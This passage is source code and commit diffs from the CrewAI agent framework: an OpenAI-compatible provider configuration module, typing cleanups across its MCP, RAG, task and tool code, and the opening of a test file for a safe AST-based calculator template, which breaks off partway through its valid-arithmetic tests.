llm = LLM(model="deepseek/deepseek-chat") # Uses DeepSeek API
llm = LLM(model="openrouter/anthropic/claude-3-opus") # Uses OpenRouter
llm = LLM(model="ollama/llama3") # Uses local Ollama
"""
from __future__ import annotations
from dataclasses import dataclass, field
import os
from typing import Any
from crewai.llms.providers.openai.completion import OpenAICompletion
@dataclass(frozen=True)
class ProviderConfig:
"""Configuration for an OpenAI-compatible provider.
Attributes:
base_url: Default base URL for the provider's API endpoint.
api_key_env: Environment variable name for the API key.
base_url_env: Environment variable name for a custom base URL override.
default_headers: HTTP headers to include in all requests.
api_key_required: Whether an API key is required for this provider.
default_api_key: Default API key to use if none is provided and not required.
"""
base_url: str
api_key_env: str
base_url_env: str | None = None
default_headers: dict[str, str] = field(default_factory=dict)
api_key_required: bool = True
default_api_key: str | None = None
OPENAI_COMPATIBLE_PROVIDERS: dict[str, ProviderConfig] = {
"openrouter": ProviderConfig(
base_url="https://openrouter.ai/api/v1",
api_key_env="OPENROUTER_API_KEY",
base_url_env="OPENROUTER_BASE_URL",
default_headers={"HTTP-Referer": "https://crewai.com"},
api_key_required=True,
),
"deepseek": ProviderConfig(
base_url="https://api.deepseek.com/v1",
api_key_env="DEEPSEEK_API_KEY",
base_url_env="DEEPSEEK_BASE_URL",
api_key_required=True,
),
"ollama": ProviderConfig(
base_url="http://localhost:11434/v1",
api_key_env="OLLAMA_API_KEY",
base_url_env="OLLAMA_HOST",
api_key_required=False,
default_api_key="ollama",
),
"ollama_chat": ProviderConfig(
base_url="http://localhost:11434/v1",
api_key_env="OLLAMA_API_KEY",
base_url_env="OLLAMA_HOST",
api_key_required=False,
default_api_key="ollama",
),
"hosted_vllm": ProviderConfig(
base_url="http://localhost:8000/v1",
api_key_env="VLLM_API_KEY",
base_url_env="VLLM_BASE_URL",
api_key_required=False,
default_api_key="dummy",
),
"cerebras": ProviderConfig(
base_url="https://api.cerebras.ai/v1",
api_key_env="CEREBRAS_API_KEY",
base_url_env="CEREBRAS_BASE_URL",
api_key_required=True,
),
"dashscope": ProviderConfig(
base_url="https://dashscope-intl.aliyuncs.com/compatible-mode/v1",
api_key_env="DASHSCOPE_API_KEY",
base_url_env="DASHSCOPE_BASE_URL",
api_key_required=True,
),
}
def _normalize_ollama_base_url(base_url: str) -> str:
"""Normalize Ollama base URL to ensure it ends with /v1.
Ollama uses OLLAMA_HOST which may not include the /v1 suffix,
but the OpenAI-compatible endpoint requires it.
Args:
base_url: The base URL, potentially without /v1 suffix.
Returns:
The base URL with /v1 suffix if needed.
"""
base_url = base_url.rstrip("/")
if not base_url.endswith("/v1"):
return f"{base_url}/v1"
return base_url
class OpenAICompatibleCompletion(OpenAICompletion):
"""OpenAI-compatible completion implementation.
This class provides support for various OpenAI-compatible APIs by
automatically configuring the base URL, API key, and headers based
on the provider name.
Supported providers:
- openrouter: OpenRouter (https://openrouter.ai)
- deepseek: DeepSeek (https://deepseek.com)
- ollama: Ollama local server (https://ollama.ai)
- ollama_chat: Alias for ollama
- hosted_vllm: vLLM server (https://github.com/vllm-project/vllm)
- cerebras: Cerebras (https://cerebras.ai)
- dashscope: Alibaba Dashscope/Qwen (https://dashscope.aliyun.com)
Example:
# Using provider prefix
llm = LLM(model="deepseek/deepseek-chat")
# Using explicit provider parameter
llm = LLM(model="llama3", provider="ollama")
# With custom configuration
llm = LLM(
model="deepseek-chat",
provider="deepseek",
api_key="my-key",
temperature=0.7
)
"""
def __init__(
self,
model: str,
provider: str,
api_key: str | None = None,
base_url: str | None = None,
default_headers: dict[str, str] | None = None,
**kwargs: Any,
) -> None:
"""Initialize OpenAI-compatible completion client.
Args:
model: The model identifier.
provider: The provider name (must be in OPENAI_COMPATIBLE_PROVIDERS).
api_key: Optional API key override. If not provided, uses the
provider's configured environment variable.
base_url: Optional base URL override. If not provided, uses the
provider's configured default or environment variable.
default_headers: Optional headers to merge with provider defaults.
**kwargs: Additional arguments passed to OpenAICompletion.
Raises:
ValueError: If the provider is not supported or required API key
is missing.
"""
config = OPENAI_COMPATIBLE_PROVIDERS.get(provider)
if config is None:
supported = ", ".join(sorted(OPENAI_COMPATIBLE_PROVIDERS.keys()))
raise ValueError(
f"Unknown OpenAI-compatible provider: {provider}. "
f"Supported providers: {supported}"
)
resolved_api_key = self._resolve_api_key(api_key, config, provider)
resolved_base_url = self._resolve_base_url(base_url, config, provider)
resolved_headers = self._resolve_headers(default_headers, config)
super().__init__(
model=model,
provider=provider,
api_key=resolved_api_key,
base_url=resolved_base_url,
default_headers=resolved_headers,
**kwargs,
)
def _resolve_api_key(
self,
api_key: str | None,
config: ProviderConfig,
provider: str,
) -> str | None:
"""Resolve the API key from explicit value, env var, or default.
Args:
api_key: Explicitly provided API key.
config: Provider configuration.
provider: Provider name for error messages.
Returns:
The resolved API key.
Raises:
ValueError: If API key is required but not found.
"""
if api_key:
return api_key
env_key = os.getenv(config.api_key_env)
if env_key:
return env_key
if config.api_key_required:
raise ValueError(
f"API key required for {provider}. "
f"Set {config.api_key_env} environment variable or pass api_key parameter."
)
return config.default_api_key
def _resolve_base_url(
self,
base_url: str | None,
config: ProviderConfig,
provider: str,
) -> str:
"""Resolve the base URL from explicit value, env var, or default.
Args:
base_url: Explicitly provided base URL.
config: Provider configuration.
provider: Provider name (used for special handling like Ollama).
Returns:
The resolved base URL.
"""
if base_url:
resolved = base_url
elif config.base_url_env:
resolved = os.getenv(config.base_url_env, config.base_url)
else:
resolved = config.base_url
if provider in ("ollama", "ollama_chat"):
resolved = _normalize_ollama_base_url(resolved)
return resolved
def _resolve_headers(
self,
headers: dict[str, str] | None,
config: ProviderConfig,
) -> dict[str, str] | None:
"""Merge user headers with provider default headers.
Args:
headers: User-provided headers.
config: Provider configuration.
Returns:
Merged headers dict, or None if empty.
"""
if not config.default_headers and not headers:
return None
merged = dict(config.default_headers)
if headers:
merged.update(headers)
return merged if merged else None
def supports_function_calling(self) -> bool:
"""Check if the provider supports function calling.
All modern OpenAI-compatible providers support function calling.
Returns:
True, as all supported providers have function calling support.
"""
return True

View File

@@ -1,22 +1,21 @@
"""MCP client with session management for CrewAI agents."""
import asyncio
from collections.abc import Callable
from collections.abc import Callable, Coroutine
from contextlib import AsyncExitStack
from datetime import datetime
import logging
import sys
import time
from typing import Any, NamedTuple
from typing import Any, NamedTuple, TypeVar
from typing_extensions import Self
# BaseExceptionGroup is available in Python 3.11+
try:
if sys.version_info >= (3, 11):
from builtins import BaseExceptionGroup
except ImportError:
# Fallback for Python < 3.11 (shouldn't happen in practice)
BaseExceptionGroup = Exception
else:
from exceptiongroup import BaseExceptionGroup
from crewai.events.event_bus import crewai_event_bus
from crewai.events.types.mcp_events import (
@@ -47,8 +46,10 @@ MCP_TOOL_EXECUTION_TIMEOUT = 30
MCP_DISCOVERY_TIMEOUT = 30 # Increased for slow servers
MCP_MAX_RETRIES = 3
_T = TypeVar("_T")
# Simple in-memory cache for MCP tool schemas (duration: 5 minutes)
_mcp_schema_cache: dict[str, tuple[dict[str, Any], float]] = {}
_mcp_schema_cache: dict[str, tuple[list[dict[str, Any]], float]] = {}
_cache_ttl = 300 # 5 minutes
@@ -134,11 +135,7 @@ class MCPClient:
else:
server_name = "Unknown MCP Server"
server_url = None
transport_type = (
self.transport.transport_type.value
if hasattr(self.transport, "transport_type")
else None
)
transport_type = self.transport.transport_type.value
return server_name, server_url, transport_type
@@ -542,7 +539,7 @@ class MCPClient:
Returns:
Cleaned arguments ready for MCP server.
"""
cleaned = {}
cleaned: dict[str, Any] = {}
for key, value in arguments.items():
# Skip None values
@@ -686,9 +683,9 @@ class MCPClient:
async def _retry_operation(
self,
operation: Callable[[], Any],
operation: Callable[[], Coroutine[Any, Any, _T]],
timeout: int | None = None,
) -> Any:
) -> _T:
"""Retry an operation with exponential backoff.
Args:

View File

@@ -23,6 +23,7 @@ from crewai.mcp.config import (
MCPServerSSE,
MCPServerStdio,
)
from crewai.mcp.transports.base import BaseTransport
from crewai.mcp.transports.http import HTTPTransport
from crewai.mcp.transports.sse import SSETransport
from crewai.mcp.transports.stdio import StdioTransport
@@ -285,6 +286,7 @@ class MCPToolResolver:
independent transport so that parallel tool executions never share
state.
"""
transport: BaseTransport
if isinstance(mcp_config, MCPServerStdio):
transport = StdioTransport(
command=mcp_config.command,

View File

@@ -2,11 +2,17 @@
from abc import ABC, abstractmethod
from enum import Enum
from typing import Any, Protocol
from typing import Any
from anyio.streams.memory import MemoryObjectReceiveStream, MemoryObjectSendStream
from mcp.shared.message import SessionMessage
from typing_extensions import Self
MCPReadStream = MemoryObjectReceiveStream[SessionMessage | Exception]
MCPWriteStream = MemoryObjectSendStream[SessionMessage]
class TransportType(str, Enum):
"""MCP transport types."""
@@ -16,22 +22,6 @@ class TransportType(str, Enum):
SSE = "sse"
class ReadStream(Protocol):
"""Protocol for read streams."""
async def read(self, n: int = -1) -> bytes:
"""Read bytes from stream."""
...
class WriteStream(Protocol):
"""Protocol for write streams."""
async def write(self, data: bytes) -> None:
"""Write bytes to stream."""
...
class BaseTransport(ABC):
"""Base class for MCP transport implementations.
@@ -46,8 +36,8 @@ class BaseTransport(ABC):
Args:
**kwargs: Transport-specific configuration options.
"""
self._read_stream: ReadStream | None = None
self._write_stream: WriteStream | None = None
self._read_stream: MCPReadStream | None = None
self._write_stream: MCPWriteStream | None = None
self._connected = False
@property
@@ -62,14 +52,14 @@ class BaseTransport(ABC):
return self._connected
@property
def read_stream(self) -> ReadStream:
def read_stream(self) -> MCPReadStream:
"""Get the read stream."""
if self._read_stream is None:
raise RuntimeError("Transport not connected. Call connect() first.")
return self._read_stream
@property
def write_stream(self) -> WriteStream:
def write_stream(self) -> MCPWriteStream:
"""Get the write stream."""
if self._write_stream is None:
raise RuntimeError("Transport not connected. Call connect() first.")
@@ -107,7 +97,7 @@ class BaseTransport(ABC):
"""Async context manager exit."""
...
def _set_streams(self, read: ReadStream, write: WriteStream) -> None:
def _set_streams(self, read: MCPReadStream, write: MCPWriteStream) -> None:
"""Set the read and write streams.
Args:

View File

@@ -1,17 +1,16 @@
"""HTTP and Streamable HTTP transport for MCP servers."""
import asyncio
import sys
from typing import Any
from typing_extensions import Self
# BaseExceptionGroup is available in Python 3.11+
try:
if sys.version_info >= (3, 11):
from builtins import BaseExceptionGroup
except ImportError:
# Fallback for Python < 3.11 (shouldn't happen in practice)
BaseExceptionGroup = Exception
else:
from exceptiongroup import BaseExceptionGroup
from crewai.mcp.transports.base import BaseTransport, TransportType

View File

@@ -122,11 +122,14 @@ class StdioTransport(BaseTransport):
if self._process is not None:
try:
self._process.terminate()
loop = asyncio.get_running_loop()
try:
await asyncio.wait_for(self._process.wait(), timeout=5.0)
await asyncio.wait_for(
loop.run_in_executor(None, self._process.wait), timeout=5.0
)
except asyncio.TimeoutError:
self._process.kill()
await self._process.wait()
await loop.run_in_executor(None, self._process.wait)
# except ProcessLookupError:
# pass
finally:

View File

@@ -52,7 +52,7 @@ class ChromaDBClient(BaseClient):
def __init__(
self,
client: ChromaDBClientType,
embedding_function: ChromaEmbeddingFunction,
embedding_function: ChromaEmbeddingFunction, # type: ignore[type-arg]
default_limit: int = 5,
default_score_threshold: float = 0.6,
default_batch_size: int = 100,

View File

@@ -23,7 +23,7 @@ from crewai.rag.core.base_client import BaseCollectionParams, BaseCollectionSear
ChromaDBClientType = ClientAPI | AsyncClientAPI
class ChromaEmbeddingFunctionWrapper(ChromaEmbeddingFunction):
class ChromaEmbeddingFunctionWrapper(ChromaEmbeddingFunction): # type: ignore[type-arg]
"""Base class for ChromaDB EmbeddingFunction to work with Pydantic validation."""
@classmethod
@@ -85,7 +85,7 @@ class ChromaDBCollectionCreateParams(BaseCollectionParams, total=False):
configuration: CollectionConfigurationInterface
metadata: CollectionMetadata
embedding_function: ChromaEmbeddingFunction
embedding_function: ChromaEmbeddingFunction # type: ignore[type-arg]
data_loader: DataLoader[Loadable]
get_or_create: bool

View File

@@ -8,7 +8,7 @@ from pydantic_settings import BaseSettings, SettingsConfigDict
from crewai.rag.core.base_embeddings_callable import EmbeddingFunction
T = TypeVar("T", bound=EmbeddingFunction)
T = TypeVar("T", bound=EmbeddingFunction) # type: ignore[type-arg]
class BaseEmbeddingsProvider(BaseSettings, Generic[T]):

View File

@@ -1,7 +1,7 @@
"""Core type definitions for RAG systems."""
from collections.abc import Sequence
from typing import TypeVar
from typing import Any, TypeVar
import numpy as np
from numpy import floating, integer, number
@@ -16,7 +16,7 @@ Embedding = NDArray[np.int32 | np.float32]
Embeddings = list[Embedding]
Documents = list[str]
Images = list[np.ndarray]
Images = list[np.ndarray[Any, np.dtype[np.generic]]]
Embeddable = Documents | Images
ScalarType = TypeVar("ScalarType", bound=np.generic)

View File

@@ -9,7 +9,7 @@ from typing_extensions import Required, TypedDict
class CustomProviderConfig(TypedDict, total=False):
"""Configuration for Custom provider."""
embedding_callable: type[EmbeddingFunction]
embedding_callable: type[EmbeddingFunction] # type: ignore[type-arg]
class CustomProviderSpec(TypedDict, total=False):

View File

@@ -85,7 +85,7 @@ class GoogleGenAIVertexEmbeddingFunction(EmbeddingFunction[Documents]):
- output_dimensionality: Optional output embedding dimension (new SDK only)
"""
# Handle deprecated 'region' parameter (only if it has a value)
region_value = kwargs.pop("region", None) # type: ignore[typeddict-item]
region_value = kwargs.pop("region", None) # type: ignore[typeddict-item,unused-ignore]
if region_value is not None:
warnings.warn(
"The 'region' parameter is deprecated, use 'location' instead. "
@@ -94,7 +94,7 @@ class GoogleGenAIVertexEmbeddingFunction(EmbeddingFunction[Documents]):
stacklevel=2,
)
if "location" not in kwargs or kwargs.get("location") is None:
kwargs["location"] = region_value # type: ignore[typeddict-unknown-key]
kwargs["location"] = region_value # type: ignore[typeddict-unknown-key,unused-ignore]
self._config = kwargs
self._model_name = str(kwargs.get("model_name", "textembedding-gecko"))
@@ -123,8 +123,10 @@ class GoogleGenAIVertexEmbeddingFunction(EmbeddingFunction[Documents]):
)
try:
import vertexai
from vertexai.language_models import TextEmbeddingModel
import vertexai # type: ignore[import-not-found]
from vertexai.language_models import ( # type: ignore[import-not-found]
TextEmbeddingModel,
)
except ImportError as e:
raise ImportError(
"vertexai is required for legacy embedding models (textembedding-gecko*). "

View File

@@ -18,7 +18,7 @@ class VoyageAIEmbeddingFunction(EmbeddingFunction[Documents]):
**kwargs: Configuration parameters for VoyageAI.
"""
try:
import voyageai # type: ignore[import-not-found]
import voyageai
except ImportError as e:
raise ImportError(
@@ -26,7 +26,7 @@ class VoyageAIEmbeddingFunction(EmbeddingFunction[Documents]):
"Install it with: uv add voyageai"
) from e
self._config = kwargs
self._client = voyageai.Client(
self._client = voyageai.Client( # type: ignore[attr-defined]
api_key=kwargs["api_key"],
max_retries=kwargs.get("max_retries", 0),
timeout=kwargs.get("timeout"),

View File

@@ -311,8 +311,7 @@ class QdrantClient(BaseClient):
points = []
for doc in batch_docs:
if _is_async_embedding_function(self.embedding_function):
async_fn = cast(AsyncEmbeddingFunction, self.embedding_function)
embedding = await async_fn(doc["content"])
embedding = await self.embedding_function(doc["content"])
else:
sync_fn = cast(EmbeddingFunction, self.embedding_function)
embedding = sync_fn(doc["content"])
@@ -412,8 +411,7 @@ class QdrantClient(BaseClient):
raise ValueError(f"Collection '{collection_name}' does not exist")
if _is_async_embedding_function(self.embedding_function):
async_fn = cast(AsyncEmbeddingFunction, self.embedding_function)
query_embedding = await async_fn(query)
query_embedding = await self.embedding_function(query)
else:
sync_fn = cast(EmbeddingFunction, self.embedding_function)
query_embedding = sync_fn(query)

View File

@@ -7,10 +7,10 @@ import numpy as np
from pydantic import GetCoreSchemaHandler
from pydantic_core import CoreSchema, core_schema
from qdrant_client import (
AsyncQdrantClient, # type: ignore[import-not-found]
QdrantClient as SyncQdrantClient, # type: ignore[import-not-found]
AsyncQdrantClient,
QdrantClient as SyncQdrantClient,
)
from qdrant_client.models import ( # type: ignore[import-not-found]
from qdrant_client.models import (
FieldCondition,
Filter,
HasIdCondition,

View File

@@ -5,10 +5,10 @@ from typing import TypeGuard
from uuid import uuid4
from qdrant_client import (
AsyncQdrantClient, # type: ignore[import-not-found]
QdrantClient as SyncQdrantClient, # type: ignore[import-not-found]
AsyncQdrantClient,
QdrantClient as SyncQdrantClient,
)
from qdrant_client.models import ( # type: ignore[import-not-found]
from qdrant_client.models import (
FieldCondition,
Filter,
MatchValue,

View File

@@ -16,7 +16,7 @@ class BaseRAGStorage(ABC):
self,
type: str,
allow_reset: bool = True,
embedder_config: ProviderSpec | BaseEmbeddingsProvider | None = None,
embedder_config: ProviderSpec | BaseEmbeddingsProvider[Any] | None = None,
crew: Any = None,
):
self.type = type

View File

@@ -580,7 +580,7 @@ class Task(BaseModel):
tools = tools or self.tools or []
self.processed_by_agents.add(agent.role)
crewai_event_bus.emit(self, TaskStartedEvent(context=context, task=self)) # type: ignore[no-untyped-call]
crewai_event_bus.emit(self, TaskStartedEvent(context=context, task=self))
result = await agent.aexecute_task(
task=self,
context=context,
@@ -662,12 +662,12 @@ class Task(BaseModel):
self._save_file(content)
crewai_event_bus.emit(
self,
TaskCompletedEvent(output=task_output, task=self), # type: ignore[no-untyped-call]
TaskCompletedEvent(output=task_output, task=self),
)
return task_output
except Exception as e:
self.end_time = datetime.datetime.now()
crewai_event_bus.emit(self, TaskFailedEvent(error=str(e), task=self)) # type: ignore[no-untyped-call]
crewai_event_bus.emit(self, TaskFailedEvent(error=str(e), task=self))
raise e # Re-raise the exception after emitting the event
finally:
clear_task_files(self.id)
@@ -694,7 +694,7 @@ class Task(BaseModel):
tools = tools or self.tools or []
self.processed_by_agents.add(agent.role)
crewai_event_bus.emit(self, TaskStartedEvent(context=context, task=self)) # type: ignore[no-untyped-call]
crewai_event_bus.emit(self, TaskStartedEvent(context=context, task=self))
result = agent.execute_task(
task=self,
context=context,
@@ -777,12 +777,12 @@ class Task(BaseModel):
self._save_file(content)
crewai_event_bus.emit(
self,
TaskCompletedEvent(output=task_output, task=self), # type: ignore[no-untyped-call]
TaskCompletedEvent(output=task_output, task=self),
)
return task_output
except Exception as e:
self.end_time = datetime.datetime.now()
crewai_event_bus.emit(self, TaskFailedEvent(error=str(e), task=self)) # type: ignore[no-untyped-call]
crewai_event_bus.emit(self, TaskFailedEvent(error=str(e), task=self))
raise e # Re-raise the exception after emitting the event
finally:
clear_task_files(self.id)

View File

@@ -32,8 +32,8 @@ class ConditionalTask(Task):
def __init__(
self,
condition: Callable[[Any], bool] | None = None,
**kwargs,
):
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
self.condition = condition

View File

@@ -1,5 +1,7 @@
"""Task output representation and formatting."""
from __future__ import annotations
import json
from typing import Any
@@ -44,7 +46,7 @@ class TaskOutput(BaseModel):
messages: list[LLMMessage] = Field(description="Messages of the task", default=[])
@model_validator(mode="after")
def set_summary(self):
def set_summary(self) -> TaskOutput:
"""Set the summary field based on the description.
Returns:

View File

@@ -1,3 +1,5 @@
from typing import Any
from pydantic import BaseModel, Field
from crewai.tools.base_tool import BaseTool
@@ -27,8 +29,8 @@ class AddImageTool(BaseTool):
self,
image_url: str,
action: str | None = None,
**kwargs,
) -> dict:
**kwargs: Any,
) -> dict[str, Any]:
action = action or i18n.tools("add_image")["default_action"] # type: ignore
content = [
{"type": "text", "text": action},

View File

@@ -1,3 +1,5 @@
from typing import Any
from pydantic import BaseModel, Field
from crewai.tools.agent_tools.base_agent_tools import BaseAgentTool
@@ -20,7 +22,7 @@ class AskQuestionTool(BaseAgentTool):
question: str,
context: str,
coworker: str | None = None,
**kwargs,
**kwargs: Any,
) -> str:
coworker = self._get_coworker(coworker, **kwargs)
return self._execute(coworker, question, context)

View File

@@ -1,3 +1,5 @@
from typing import Any
from pydantic import BaseModel, Field
from crewai.tools.agent_tools.base_agent_tools import BaseAgentTool
@@ -22,7 +24,7 @@ class DelegateWorkTool(BaseAgentTool):
task: str,
context: str,
coworker: str | None = None,
**kwargs,
**kwargs: Any,
) -> str:
coworker = self._get_coworker(coworker, **kwargs)
return self._execute(coworker, task, context)

View File

@@ -70,7 +70,7 @@ class MCPNativeTool(BaseTool):
"""Get the server name."""
return self._server_name
def _run(self, **kwargs) -> str:
def _run(self, **kwargs: Any) -> str:
"""Execute tool using the MCP client session.
Args:
@@ -98,7 +98,7 @@ class MCPNativeTool(BaseTool):
f"Error executing MCP tool {self.original_tool_name}: {e!s}"
) from e
async def _run_async(self, **kwargs) -> str:
async def _run_async(self, **kwargs: Any) -> str:
"""Async implementation of tool execution.
A fresh ``MCPClient`` is created for every invocation so that

View File

@@ -1,6 +1,8 @@
"""MCP Tool Wrapper for on-demand MCP server connections."""
import asyncio
from collections.abc import Callable, Coroutine
from typing import Any
from crewai.tools import BaseTool
@@ -16,9 +18,9 @@ class MCPToolWrapper(BaseTool):
def __init__(
self,
mcp_server_params: dict,
mcp_server_params: dict[str, Any],
tool_name: str,
tool_schema: dict,
tool_schema: dict[str, Any],
server_name: str,
):
"""Initialize the MCP tool wrapper.
@@ -54,7 +56,7 @@ class MCPToolWrapper(BaseTool):
self._server_name = server_name
@property
def mcp_server_params(self) -> dict:
def mcp_server_params(self) -> dict[str, Any]:
"""Get the MCP server parameters."""
return self._mcp_server_params
@@ -68,7 +70,7 @@ class MCPToolWrapper(BaseTool):
"""Get the server name."""
return self._server_name
def _run(self, **kwargs) -> str:
def _run(self, **kwargs: Any) -> str:
"""Connect to MCP server and execute tool.
Args:
@@ -84,13 +86,15 @@ class MCPToolWrapper(BaseTool):
except Exception as e:
return f"Error executing MCP tool {self.original_tool_name}: {e!s}"
async def _run_async(self, **kwargs) -> str:
async def _run_async(self, **kwargs: Any) -> str:
"""Async implementation of MCP tool execution with timeouts and retry logic."""
return await self._retry_with_exponential_backoff(
self._execute_tool_with_timeout, **kwargs
)
async def _retry_with_exponential_backoff(self, operation_func, **kwargs) -> str:
async def _retry_with_exponential_backoff(
self, operation_func: Callable[..., Coroutine[Any, Any, str]], **kwargs: Any
) -> str:
"""Retry operation with exponential backoff, avoiding try-except in loop for performance."""
last_error = None
@@ -119,7 +123,7 @@ class MCPToolWrapper(BaseTool):
)
async def _execute_single_attempt(
self, operation_func, **kwargs
self, operation_func: Callable[..., Coroutine[Any, Any, str]], **kwargs: Any
) -> tuple[str | None, str, bool]:
"""Execute single operation attempt and return (result, error_message, should_retry)."""
try:
@@ -158,22 +162,23 @@ class MCPToolWrapper(BaseTool):
return None, f"Server response parsing error: {e!s}", True
return None, f"MCP execution error: {e!s}", False
async def _execute_tool_with_timeout(self, **kwargs) -> str:
async def _execute_tool_with_timeout(self, **kwargs: Any) -> str:
"""Execute tool with timeout wrapper."""
return await asyncio.wait_for(
self._execute_tool(**kwargs), timeout=MCP_TOOL_EXECUTION_TIMEOUT
)
async def _execute_tool(self, **kwargs) -> str:
async def _execute_tool(self, **kwargs: Any) -> str:
"""Execute the actual MCP tool call."""
from mcp import ClientSession
from mcp.client.streamable_http import streamablehttp_client
from mcp.types import TextContent
server_url = self.mcp_server_params["url"]
try:
# Wrap entire operation with single timeout
async def _do_mcp_call():
async def _do_mcp_call() -> str:
async with streamablehttp_client(
server_url, terminate_on_close=True
) as (read, write, _):
@@ -183,17 +188,11 @@ class MCPToolWrapper(BaseTool):
self.original_tool_name, kwargs
)
# Extract the result content
if hasattr(result, "content") and result.content:
if (
isinstance(result.content, list)
and len(result.content) > 0
):
content_item = result.content[0]
if hasattr(content_item, "text"):
return str(content_item.text)
return str(content_item)
return str(result.content)
if result.content:
content_item = result.content[0]
if isinstance(content_item, TextContent):
return content_item.text
return str(content_item)
return str(result)
return await asyncio.wait_for(
@@ -203,7 +202,7 @@ class MCPToolWrapper(BaseTool):
except asyncio.CancelledError as e:
raise asyncio.TimeoutError("MCP operation was cancelled") from e
except Exception as e:
if hasattr(e, "__cause__") and e.__cause__:
if e.__cause__ is not None:
raise asyncio.TimeoutError(
f"MCP connection error: {e.__cause__}"
) from e.__cause__

View File

@@ -81,7 +81,7 @@ class TaskEvaluator:
"""
crewai_event_bus.emit(
self,
TaskEvaluationEvent(evaluation_type="task_evaluation", task=task), # type: ignore[no-untyped-call]
TaskEvaluationEvent(evaluation_type="task_evaluation", task=task),
)
evaluation_query = (
f"Assess the quality of the task completed based on the description, expected output, and actual results.\n\n"
@@ -129,7 +129,7 @@ class TaskEvaluator:
"""
crewai_event_bus.emit(
self,
TaskEvaluationEvent(evaluation_type="training_data_evaluation"), # type: ignore[no-untyped-call]
TaskEvaluationEvent(evaluation_type="training_data_evaluation"),
)
output_training_data = training_data[agent_id]

View File

@@ -12,16 +12,16 @@ from uuid import UUID
if TYPE_CHECKING:
from aiocache import Cache
from aiocache import Cache # type: ignore[import-untyped]
from crewai_files import FileInput
logger = logging.getLogger(__name__)
_file_store: Cache | None = None
_file_store: Cache | None = None # type: ignore[no-any-unimported]
try:
from aiocache import Cache
from aiocache.serializers import PickleSerializer
from aiocache.serializers import PickleSerializer # type: ignore[import-untyped]
_file_store = Cache(Cache.MEMORY, serializer=PickleSerializer())
except ImportError:

View File

@@ -39,7 +39,7 @@ class GuardrailResult(BaseModel):
@field_validator("result", "error")
@classmethod
def validate_result_error_exclusivity(cls, v: Any, info) -> Any:
def validate_result_error_exclusivity(cls, v: Any, info: Any) -> Any:
"""Ensure that result and error are mutually exclusive based on success.
Args:

View File

@@ -2,7 +2,7 @@
from __future__ import annotations
from typing import Literal
from typing import Any, Literal
from uuid import uuid4
from pydantic import BaseModel, Field, field_validator
@@ -259,7 +259,7 @@ class StepObservation(BaseModel):
@field_validator("suggested_refinements", mode="before")
@classmethod
def coerce_single_refinement_to_list(cls, v):
def coerce_single_refinement_to_list(cls, v: Any) -> Any:
"""Coerce a single dict refinement into a list to handle LLM returning a single object."""
if isinstance(v, dict):
return [v]

View File

@@ -182,7 +182,7 @@ class AgentReasoning:
if self.config.llm is not None:
if isinstance(self.config.llm, LLM):
return self.config.llm
return create_llm(self.config.llm)
return cast(LLM, create_llm(self.config.llm))
return cast(LLM, self.agent.llm)
def handle_agent_reasoning(self) -> AgentReasoningOutput:

View File

@@ -75,7 +75,7 @@ class RPMController(BaseModel):
self._current_rpm = 0
def _reset_request_count(self) -> None:
def _reset():
def _reset() -> None:
self._current_rpm = 0
if not self._shutdown_flag:
self._timer = threading.Timer(60.0, self._reset_request_count)

View File

@@ -60,7 +60,9 @@ def _extract_tool_call_info(
StreamChunkType.TOOL_CALL,
ToolCallChunk(
tool_id=event.tool_call.id,
tool_name=sanitize_tool_name(event.tool_call.function.name),
tool_name=sanitize_tool_name(event.tool_call.function.name)
if event.tool_call.function.name
else None,
arguments=event.tool_call.function.arguments,
index=event.tool_call.index,
),

View File

@@ -76,7 +76,7 @@ Please provide ONLY the {field_name} field value as described:
Respond with ONLY the requested information, nothing else.
"""
return self.llm.call(
result: str = self.llm.call(
[
{
"role": "system",
@@ -85,6 +85,7 @@ Respond with ONLY the requested information, nothing else.
{"role": "user", "content": prompt},
]
)
return result
def _process_field_value(self, response: str, field_type: type | None) -> Any:
response = response.strip()
@@ -104,7 +105,8 @@ Respond with ONLY the requested information, nothing else.
def _parse_list(self, response: str) -> list[Any]:
try:
if response.startswith("["):
return json.loads(response)
parsed: list[Any] = json.loads(response)
return parsed
items: list[str] = [
item.strip() for item in response.split("\n") if item.strip()

View File

@@ -1571,8 +1571,9 @@ class TestReasoningEffort:
executor.agent.planning_config = None
assert executor._get_reasoning_effort() == "medium"
# Case 3: planning_config without reasoning_effort attr → defaults to "medium"
executor.agent.planning_config = Mock(spec=[])
# Case 3: planning_config with default reasoning_effort
executor.agent.planning_config = Mock()
executor.agent.planning_config.reasoning_effort = "medium"
assert executor._get_reasoning_effort() == "medium"

View File

@@ -0,0 +1,184 @@
"""Tests for the safe calculator tool pattern in the AGENTS.md template.
Verifies that the calculator example uses a safe AST-based evaluator
instead of eval(), and that it correctly handles both valid math
expressions and rejects malicious code injection attempts.
"""
import ast
import operator
import re
from pathlib import Path
import pytest
# ---------------------------------------------------------------------------
# Extract and compile the calculator function from the AGENTS.md template
# so that the tests always stay in sync with the shipped code.
# ---------------------------------------------------------------------------
TEMPLATE_PATH = (
Path(__file__).resolve().parents[2]
/ "src"
/ "crewai"
/ "cli"
/ "templates"
/ "AGENTS.md"
)
def _extract_calculator_source() -> str:
"""Return the Python source of the Calculator tool block in AGENTS.md."""
content = TEMPLATE_PATH.read_text()
# Find the code block after "### Using @tool Decorator"
pattern = r"### Using @tool Decorator\s*```python\s*(.*?)```"
match = re.search(pattern, content, re.DOTALL)
assert match, "Could not find Calculator code block in AGENTS.md"
return match.group(1)
def _build_calculator():
"""Compile the calculator code from the template and return the function.
We deliberately avoid importing crewai.tools so that the test does not
need the full crewai stack. The @tool decorator is replaced with a
no-op so we get the plain function.
"""
source = _extract_calculator_source()
# Replace the crewai-specific import and decorator with a no-op
source = source.replace("from crewai.tools import tool", "")
source = source.replace('@tool("Calculator")', "")
namespace: dict = {}
exec(source, namespace) # noqa: S102 we control the source
return namespace["calculator"]
calculator = _build_calculator()
# ---- Valid arithmetic expressions ----
class TestSafeCalculatorValidExpressions:
def test_addition(self):
assert calculator("2 + 3") == "5"
def test_subtraction(self):
assert calculator("10 - 4") == "6"
def test_multiplication(self):
assert calculator("6 * 7") == "42"
def test_division(self):
assert calculator("10 / 4") == "2.5"
def test_power(self):
assert calculator("2 ** 10") == "1024"
def test_unary_negative(self):
assert calculator("-5") == "-5"
def test_negative_in_expression(self):
assert calculator("-3 + 7") == "4"
def test_parentheses(self):
assert calculator("(2 + 3) * 4") == "20"
def test_nested_parentheses(self):
assert calculator("((1 + 2) * (3 + 4))") == "21"
def test_float_values(self):
assert calculator("3.14 * 2") == "6.28"
def test_complex_expression(self):
